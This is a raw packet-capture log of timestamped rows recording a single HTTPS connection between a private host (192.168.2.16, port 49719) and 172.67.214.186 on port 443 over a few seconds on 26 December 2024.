Dec 26, 2024 18:26:48.123821020 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.123838902 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.130595922 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.130640030 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.130686998 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.130691051 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.130717993 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.130749941 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.137756109 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.137800932 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.137833118 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.137837887 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.137864113 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.137892008 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.143902063 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.143961906 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.143979073 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.143985033 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.144033909 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.151163101 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.151206970 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.151243925 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.151248932 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.151277065 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.151288986 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.157907009 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.157949924 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.157983065 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.157987118 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.158015013 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.158036947 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.164916039 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.164958954 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.164994955 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.164999962 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.165026903 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.165051937 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.175335884 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.175383091 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.175416946 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.175421953 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.175450087 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.175471067 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.334008932 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.334060907 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.334127903 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.334142923 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.334177971 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.334201097 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.341137886 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.341185093 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.341218948 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.341223955 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.341264009 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.341264009 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.341279984 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.348207951 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.348252058 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.348297119 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.348300934 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.348334074 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.348359108 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.354475021 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.354521036 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.354562044 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.354566097 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.354594946 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.354614973 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.361619949 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.361664057 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.361706018 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.361712933 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.361747980 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.361757040 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.368346930 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.368386984 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.368431091 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.368434906 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.368462086 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.368486881 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.375591993 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.375637054 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.375689030 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.375693083 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.375724077 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.375750065 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.386234999 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.386281013 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.386318922 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.386323929 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.386351109 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.386373043 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.544640064 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.544720888 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.544753075 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.544764042 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.544812918 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.551624060 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.551668882 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.551716089 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.551722050 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.551736116 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.551760912 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.558793068 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.558834076 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.558866024 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.558871031 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.558902979 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.558921099 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.565072060 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.565115929 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.565149069 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.565152884 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.565181971 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.565196991 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.572331905 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.572372913 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.572406054 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.572410107 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.572437048 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.572462082 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.578982115 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.579025030 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.579060078 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.579063892 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.579091072 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.579112053 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.586112022 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.586157084 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.586210012 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.586215019 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.586224079 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.586263895 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.596466064 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.596509933 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.596550941 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.596555948 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.596585989 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.596604109 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.755044937 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.755131006 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.755179882 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.755191088 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.755218983 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.755240917 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.762346029 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.762408018 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.762428045 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.762433052 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.762459040 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.762480021 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.769385099 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.769429922 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.769476891 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.769480944 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.769510984 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.769529104 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.775616884 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.775660992 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.775701046 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.775706053 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.775733948 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.775755882 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.782912016 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.782954931 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.782989025 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.782993078 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.783020020 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.783042908 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.789474964 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.789520979 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.789568901 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.789573908 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.789611101 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.789628029 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.796654940 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.796694994 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.796739101 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.796746969 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.796770096 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.796792984 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.807718992 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.807760954 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.807818890 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.807826042 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.807872057 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.966608047 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.966670036 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.966717958 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.966730118 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.966762066 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.966780901 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.972635031 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.972681046 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.972713947 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.972718954 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.972744942 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.972763062 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.979706049 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.979748964 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.979784966 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.979789972 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.979834080 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.981601000 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.986901045 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.986942053 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.986972094 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.986977100 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.987004042 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.987023115 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.993160009 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.993206024 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.993241072 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.993247986 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:48.993266106 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:48.993287086 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.000786066 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.000847101 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.000859022 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.000875950 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.000916004 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.000930071 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.007019043 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.007060051 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.007087946 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.007102013 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.007143021 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.007162094 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.018219948 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.018274069 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.018306971 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.018311977 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.018337965 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.018358946 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.176616907 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.176687002 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.176713943 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.176724911 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.176739931 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.176763058 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.183711052 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.183756113 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.183810949 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.183815956 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.183840036 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.183855057 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.190979958 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.191020012 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.191077948 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.191082954 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.191121101 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.191129923 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.197168112 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.197213888 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.197257042 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.197263956 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.197294950 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.197314024 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.204317093 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.204379082 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.204462051 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.204467058 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.204519987 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.211071968 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.211114883 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.211154938 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.211159945 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.211196899 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.211215973 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.218398094 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.218436956 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.218601942 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.218606949 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.218667030 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.228239059 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.228317976 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.228352070 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.228421926 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.387989044 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.388025045 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.388096094 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.388103962 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.388122082 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.388151884 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.394251108 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.394299984 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.394335985 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.394340038 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.394366980 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.394382954 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.401279926 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.401349068 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.401369095 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.401375055 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.401416063 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.401434898 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.408369064 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.408394098 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.408441067 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.408444881 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.408474922 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.408497095 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.414727926 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.414757013 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.414798975 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.414803982 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.414835930 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.414855957 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.422255993 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.422302961 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.422337055 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.422343016 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.422363043 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.422384977 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.428627014 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.428672075 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.428724051 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.428729057 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.428761959 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.428780079 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.441333055 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.441376925 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.441412926 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.441421986 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.441445112 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.441467047 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.598598003 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.598654985 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.598702908 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.598709106 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.598753929 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.604635000 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.604656935 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.604724884 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.604732037 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.604779005 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.612010002 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.612025976 CET	443	49719	172.67.214.186	192.168.2.16
Dec 26, 2024 18:26:49.612085104 CET	49719	443	192.168.2.16	172.67.214.186
Dec 26, 2024 18:26:49.612092018 CET	443	49719	172.67.214.186	192.168.2.16
